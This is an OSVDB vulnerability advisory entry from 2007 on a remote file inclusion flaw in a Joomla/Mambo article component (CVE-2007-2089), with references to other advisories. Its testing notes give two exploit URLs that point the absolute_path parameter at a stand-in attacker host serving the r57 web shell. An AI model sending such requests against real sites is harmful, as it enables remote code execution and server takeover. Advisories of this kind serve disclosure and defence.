Jx Development Article for Joomla/Mambo com_articles.php absolute_path Variable Remote File Inclusion

2007-04-14T00:00:00
ID OSVDB:34802
Type osvdb
Reporter OSVDB
Modified 2007-04-14T00:00:00

Description

Manual Testing Notes

http://[target]/joomla_path/components/com_articles.php?absolute_path=http://[attacker]/r57.txt?
http://[target]/joomla_path/classes/html/com_articles.php?absolute_path=http://[attacker]/r57.txt?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0293.html
ISS X-Force ID: 33663
Generic Exploit URL: http://www.milw0rm.com/exploits/3736
FrSIRT Advisory: ADV-2007-1394
CVE-2007-2089
Bugtraq ID: 23513